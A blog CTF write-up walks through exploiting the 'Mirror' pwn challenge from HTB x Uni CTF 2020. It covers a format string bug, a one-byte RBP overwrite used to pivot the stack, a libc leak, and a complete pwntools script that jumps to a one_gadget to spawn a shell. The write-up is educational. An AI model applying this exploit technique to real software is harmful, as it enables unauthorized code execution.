<!DOCTYPE html>
<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Roboto:ital,wght@0,100..900;1,100..900&display=swap" rel="stylesheet">
<html lang="en"><head>
  <meta charset="utf-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  

  <title>
    
      Mirror
    
  </title>

  <!-- Begin Jekyll SEO tag v2.6.1 -->
<meta name="generator" content="Jekyll v4.4.1" />
<meta property="og:title" content="Mirror" />
<meta name="author" content="David Fernandez" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="Litios blog" />
<meta property="og:description" content="Litios blog" />
<link rel="canonical" href="http://0.0.0.0:4000/2020/11/25/mirror.html" />
<meta property="og:url" content="http://0.0.0.0:4000/2020/11/25/mirror.html" />
<meta property="og:site_name" content="Litios Blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2020-11-25T00:00:00+01:00" />
<script type="application/ld+json">
{"headline":"Mirror","url":"http://0.0.0.0:4000/2020/11/25/mirror.html","datePublished":"2020-11-25T00:00:00+01:00","dateModified":"2020-11-25T00:00:00+01:00","mainEntityOfPage":{"@type":"WebPage","@id":"http://0.0.0.0:4000/2020/11/25/mirror.html"},"author":{"@type":"Person","name":"David Fernandez"},"@type":"BlogPosting","description":"Litios blog","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->

  <link type="application/atom+xml" rel="alternate" href="http://0.0.0.0:4000/feed.xml" title="Litios Blog" />

  <link rel="shortcut icon" type="image/x-icon" href="/./logo.ico" />
  <link rel="stylesheet" href="http://0.0.0.0:4000/assets/css/main.css" />
  <link href="https://fonts.googleapis.com/icon?family=Material+Icons"
      rel="stylesheet">
</head>
<body a="light" style="color: #f2f2f2">
    <main class="page-content" aria-label="Content">
        <div class="w">
            <div style="display: flex; justify-content: space-between;">
<a style="font-size: 2em;" href="http://0.0.0.0:4000">..</a>
<span onClick="if (document.body.style.color != 'rgb(242, 242, 242)'){
document.body.style.color = '#f2f2f2'; document.body.style.backgroundColor = '#202324';
} else {
document.body.style.color = 'black'; document.body.style.backgroundColor = 'white';
}
" class="material-icons" style="
    cursor: pointer;
    display:flex;
    flex-direction:column;
    justify-content:end;
    align-items:center;
">visibility</span>
</div>
<br><br><br>
<pre style="font-size: 0.5vw; text-align: center">

                                                                              
                                                                              
                        MMMMMMMMMMMMMMM:                    :MMMMMMMMMMMMMM   
                    MMMMMMMMMMMMMMMMMMMMMMMM             MMMMMMMMMMMMMMMMMM   
                7MMMMMMMMMMMMMMMMMMMMMMMMMMMMMM        MMMMMMMMMMMMMMMMMMMM   
              MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM   MMMMMMMMMMMMMMMMMMMMMM   
            MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM$MMMMMMMM                  
          MMMMMMMMMM  ~MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM                    
         MMMMMMMM=      MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM                      
       MMMMMMMM:         MMMMMMMMMMMMMMMMMMMMMMMMMMMMMM                       
      MMMMMMMM            MMMMMMMMMMMMMMMMMMMMMMMMMMMM                        
     MMMMMMM               MMMMMMMMMMMMMMMMMMMMMMMMMMM                        
    MMMMMMM                MMMMMMMMMMMMMMMMMMMMMMMMMMM                        
   MMMMMMM                 MMMMMMMMMMMMMMMMMMMMMMMMMMM                        
   MMMMMM                  NMMMMMMMMMMMMMMMMMMMMMMMMM                         
  MMMMMM     MMMMMM         MMMMMMMMMMMMMMMMMMMMMMMMM         MMMMM8          
  MMMMMM    MMMMMMMM         MMMMMMMMMMMMMMMMMMMMMMM         MMMMMMMM         
 MMMMMM     MMMMMMMM         =MMMMMMMMMMMMMMMMMMMMM         MMMMMMMMM         
 MMMMMM     MMMMMMMM          MMMMMMMMMMMMMMMMMMMMM          MMMMMMMM         
 MMMMM       MMMMMM            MMMMMMMMMMMMMMMMMMM           .MMMMMM          
MMMMMM                         IMMMMMMMMMMMMMMMMM                             
MMMMMM                          MMMMMMMMMMMMMMMMD                             
MMMMMM                           MMMMMMMMMMMMMMM                              
MMMMMM                            MMMMMMMMMMMMM                               
=MMMMM                            MMMMMMMMMMMMM                               
 MMMMMM                          +MMMMMMMMMMMMM                               
 MMMMMM                    MMMMMMMMMMMMMMMMMMMMMMMMMMM                        
 $MMMMM.                  MMMMMMMMMMMMMMMMMMMMMMMMMMMMM                       
  MMMMMM                  MMMMMMMMMMMMMMMMMMMMMMMMMMMMM                       
  $MMMMMM                 MMMMMMMMMMMMMMMMMMMMMMMMMMMMM                       
   MMMMMMM        MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM               
    MMMMMMM      MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM               
     MMMMMMM      MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM               
      MMMMMMM             MMMMMMMMMMMMMMMMMMMMMMMMMMMMM                       
       MMMMMMMM           MMMMMMMMMMMMMMMMMMMMMMMMMMMMM                       
        MMMMMMMMM         MMMMMMMMMMMMMMMMMMMMMMMMMMMMM                       
         .MMMMMMMMM       MMMMMMMMMMMMMMMMMMMMMMMMMMMMM                       
           MMMMMMMMMMM   MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM                      
             MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM                    
               IMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM   MMMMMMMMMMMMMMMMMMMMMMMM   
                  OMMMMMMMMMMMMMMMMMMMMMMMMMM        MMMMMMMMMMMMMMMMMMMMMM   
                      7MMMMMMMMMMMMMMMMMM              MMMMMMMMMMMMMMMMMMMM   
                                                                      
</pre>

<hr />

<h2 id="first-look">First look</h2>
<p>Mirror was a pwn challenge rated with 425 in the HTB x Uni CTF 2020 - Quals. Let’s run it first</p>

<p><img src="/./assets/imgs/mirror-execute.png" alt="Mirror-execute" /></p>

<p>So the binary asks if we want to talk to the mirror, then shows us 2 addreses (?) and finally we can enter some data.</p>

<p>Not much (as always)</p>

<p>Let’s start Cutter and begin looking for some information about what’s going on.</p>

<p><img src="/./assets/imgs/mirror-dashboard.png" alt="Mirror-execute" /></p>

<p>We have the NX bit active and the PIC so the addresses are going to be random each time and the execute and storage areas are going to be separated</p>

<p>Let’s see what the code can tell us!</p>

<h2 id="let-the-inspection-begin">Let the inspection begin</h2>

<h3 id="main">Main</h3>
<p>First stop: main function. When we disassemble this function we can see the instructions that the program displayed and the read from the beginning.</p>

<p><img src="/./assets/imgs/mirror-main.png" alt="Mirror-execute" /></p>

<p>It’s kinda weird that the read allows 0x1f bytes, that’s a lot for a single char (maybe we can do something here?)</p>

<p>Let’s move on.</p>

<p>After that, it checks the fist byte from the read, that’s the first letter, and compares it with 0x79 (y) or 0x59 (Y). If it isn’t neither of them, it calls exit.</p>

<p><img src="/./assets/imgs/mirror-main-2.png" alt="Mirror-execute" /></p>

<p>First thing we know: we always have to put a <strong>y</strong> or <strong>Y</strong> as the first letter on that input.</p>

<p>After that, it gives the input back to us. Looking at the print functions (we know this because we executed it before and saw the <em>Your answer was</em> string) it doesn’t look like it’s performing a safe print of our string. This looks like a format string vulnerability. We will check that later.</p>

<p>Finally, it calls the reveal function. Next stop: reveal</p>

<h3 id="reveal">Reveal</h3>

<p>The reveal function looks like this:</p>

<p><img src="/./assets/imgs/mirror-reveal.png" alt="Mirror-execute" /></p>

<p>Now we know that those addresses were. We can see the buf address is put inside the RAX and later into the RSI register so the first address is the address of our input buffer. The second address goes to the rdx register from the printf function.</p>

<p>Then, we can put some data into the stack. 0x21 bytes exactly. But we can see that the stack in this function has a size of 0x20 (check the sub operation at the beginning of the function). So we can override one byte of the address that the RBP, i.e. the base pointer of the stack, is going to take after we left the function.</p>

<h2 id="what-now">What now?</h2>

<p>After looking at the binary we know:</p>

<ul>
  <li>It looks like there is some kind of format string vulnerability at the first read. Remember that the first letter has to be a y or Y.</li>
  <li>We know the address of the buffer where we are going to put our final data</li>
  <li>We know the address of the printf so we can figure out what the base address of glibc is</li>
  <li>We can override one byte of the base stack address when we left the reveal function</li>
</ul>

<p>My main approach at this point is to use ROP to generate a shell. This is because the program is giving us the address of the printf and we know the address where our data is going to be.</p>

<h2 id="what-about-the-format-string">What about the format string?</h2>

<p>Even though I didn’t need it for my exploit there was a format string vulnerability in the code.</p>

<p><img src="/./assets/imgs/mirror-format-string.png" alt="Mirror-execute" /></p>

<p>We could probably find a way to exploit this vulnerability but it wasn’t necessary for the exploit we want to perform.</p>

<h2 id="the-exploit">The exploit</h2>

<p>This is the idea: we are going to use ROP when the main function returns and use glibc to get a shell.</p>

<p>The target here is to put the RSP address on our input so when it returns we can jump wherever we want, you know, ROP.</p>

<p>The trick here is that one byte we can override on the reveal call.</p>

<p>Let’s break it down. This is how the stack looks on the reveal function:
<img src="/./assets/imgs/mirror-stack.jpg" alt="Mirror-execute" /></p>

<p>And we know the address of our input, which is right above the RBP return address. Remember we can override one byte of that address so we can point it back to our leaked address.</p>

<blockquote>
  <p>Remeber that address are read backwards</p>
</blockquote>

<p><img src="/./assets/imgs/mirror-override.jpg" alt="Mirror-execute" /></p>

<blockquote>
  <p>There are going to be times when this doesn’t work. When the 2nd byte changes, this won’t work because we cannot reach the desired address</p>
</blockquote>

<p>But, I said we wanted the RSP to be on that address. And we have the RBP, not the RSP. Well, remember that when leave executes, the RSP takes the previous RBP address + 8.</p>

<p>So, when we leave on the main function, our RSP will be on the address of our leaked input + 8.</p>

<blockquote>
  <p>You can modify the byte to be the byte it should be - 8 so the final RSP value is on the beginning of the leaked address but it’s easy to explain it this way</p>
</blockquote>

<p>Nice, we redirected the execution!</p>

<h2 id="pwn-it">Pwn it</h2>

<p>So, we know we have to send 0x20 bytes (which will be our ROP) and finally the last byte from the leaked address.</p>

<p>Let’s build the ROP payload.</p>

<h3 id="rop">ROP</h3>

<p>First things first, we must know the glibc version. We are going to use the <a href="https://libc.nullbyte.cat/">libc database</a> to make our job easier.</p>

<p>When we put the printf address on the page, we get a bunch of hits but only one is for x64. Ubuntu GLIBC 2.27-3ubuntu1.3.</p>

<p>I usually use the amazing tool called <a href="https://github.com/david942j/one_gadget">one_gadget</a> which provides a simple and easy way to exploit a ROP vulnerability.</p>

<p>When we execute it against the libc.so.6 file we get the following results:</p>

<p><img src="/./assets/imgs/mirror-one.png" alt="Mirror-execute" /></p>

<p>Let’s write those address down so we can check if something works for us.</p>

<h3 id="final-exploit">Final exploit</h3>

<p>First, we are going to use python3 and pwntools to easily send everything we need.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="n">pwn</span> <span class="kn">import</span> <span class="o">*</span>
<span class="kn">import</span> <span class="n">os</span>

<span class="n">p</span> <span class="o">=</span> <span class="nf">process</span><span class="p">(</span><span class="sh">'</span><span class="s">./mirror</span><span class="sh">'</span><span class="p">)</span>
<span class="c1">#p = remote('_________', ____)
</span><span class="n">libc</span> <span class="o">=</span> <span class="nc">ELF</span><span class="p">(</span><span class="sh">'</span><span class="s">./libc.so.6</span><span class="sh">'</span><span class="p">)</span>
<span class="n">binary</span> <span class="o">=</span> <span class="nc">ELF</span><span class="p">(</span><span class="sh">'</span><span class="s">./mirror</span><span class="sh">'</span><span class="p">)</span>
</code></pre></div></div>

<p>Let’s answer the first question</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nf">print</span><span class="p">(</span><span class="n">p</span><span class="p">.</span><span class="nf">recvuntil</span><span class="p">(</span><span class="sh">'</span><span class="s">&gt;</span><span class="sh">'</span><span class="p">))</span>
<span class="n">p</span><span class="p">.</span><span class="nf">sendline</span><span class="p">(</span><span class="sh">'</span><span class="s">y</span><span class="sh">'</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="n">p</span><span class="p">.</span><span class="nf">recvuntil</span><span class="p">(</span><span class="sh">'"'</span><span class="p">))</span>
</code></pre></div></div>

<p>Now, receive the addresses:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">data</span> <span class="o">=</span> <span class="n">p</span><span class="p">.</span><span class="nf">recvuntil</span><span class="p">(</span><span class="sh">'"'</span><span class="p">).</span><span class="nf">decode</span><span class="p">()</span>
<span class="n">base_address</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="mi">36</span><span class="p">:</span><span class="o">-</span><span class="mi">1</span><span class="p">].</span><span class="nf">split</span><span class="p">(</span><span class="sh">'</span><span class="s"> </span><span class="sh">'</span><span class="p">)[</span><span class="mi">0</span><span class="p">][</span><span class="mi">1</span><span class="p">:</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
<span class="n">libc_leak</span> <span class="o">=</span> <span class="nf">int</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="mi">36</span><span class="p">:</span><span class="o">-</span><span class="mi">1</span><span class="p">].</span><span class="nf">split</span><span class="p">(</span><span class="sh">'</span><span class="s"> </span><span class="sh">'</span><span class="p">)[</span><span class="mi">1</span><span class="p">][</span><span class="mi">1</span><span class="p">:</span><span class="o">-</span><span class="mi">1</span><span class="p">],</span> <span class="n">base</span><span class="o">=</span><span class="mi">16</span><span class="p">)</span>
</code></pre></div></div>

<p>We can calculate the base libc address with:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">libc_base</span> <span class="o">=</span> <span class="n">libc_leak</span> <span class="o">-</span> <span class="n">libc</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="sh">"</span><span class="s">printf</span><span class="sh">"</span><span class="p">]</span>
</code></pre></div></div>

<p>Now, we now what byte we have to modify on that RBP address:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">to_change</span> <span class="o">=</span> <span class="nf">int</span><span class="p">(</span><span class="sh">"</span><span class="s">0x</span><span class="sh">"</span> <span class="o">+</span> <span class="n">base_address</span><span class="p">[</span><span class="o">-</span><span class="mi">2</span><span class="p">:],</span> <span class="n">base</span><span class="o">=</span><span class="mi">16</span><span class="p">)</span>
<span class="n">to_change</span> <span class="o">=</span>  <span class="nf">bytes</span><span class="p">(</span><span class="nf">chr</span><span class="p">(</span><span class="n">to_change</span><span class="p">),</span> <span class="n">encoding</span><span class="o">=</span><span class="sh">"</span><span class="s">UTF-8</span><span class="sh">"</span><span class="p">)</span>
</code></pre></div></div>

<p>Everything is ready. Let’s send the base address we got so the RBP gets a real address when execute leave on the main function, our one_gadget first address with the libc base added and 16 Bs to fill the 0x20 bytes plus our final byte to change.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">one_gadget_1</span> <span class="o">=</span> <span class="mh">0x4f3d5</span>
<span class="n">p</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="nf">p64</span><span class="p">(</span><span class="nf">int</span><span class="p">(</span><span class="n">base_address</span><span class="p">,</span> <span class="n">base</span><span class="o">=</span><span class="mi">16</span><span class="p">))</span> <span class="o">+</span> <span class="nf">p64</span><span class="p">(</span><span class="n">libc_base</span> <span class="o">+</span> <span class="n">one_gadget_1</span><span class="p">)</span> <span class="o">+</span> <span class="nf">bytes</span><span class="p">(</span><span class="sh">'</span><span class="s">B</span><span class="sh">'</span> <span class="o">*</span> <span class="mi">16</span><span class="p">,</span> <span class="n">encoding</span><span class="o">=</span><span class="sh">"</span><span class="s">UTF-8</span><span class="sh">"</span><span class="p">)</span> <span class="o">+</span> <span class="n">to_change</span><span class="p">)</span>
<span class="n">p</span><span class="p">.</span><span class="nf">interactive</span><span class="p">()</span>
</code></pre></div></div>

<p>We send it and….
pwned!</p>

<p><img src="/./assets/imgs/mirror-final.png" alt="Mirror-execute" /></p>

<blockquote>
  <p>I didn’t screenshot the remote shell so this is running locally :S</p>
</blockquote>

<hr />
<p>That’s all!</p>

<p><strong>See you on the debugger!</strong></p>

<p><img src="/./assets/imgs/mirror-badge.png" alt="Mirror-execute" /></p>


        </div>
    </main>

    
    </body>
</html>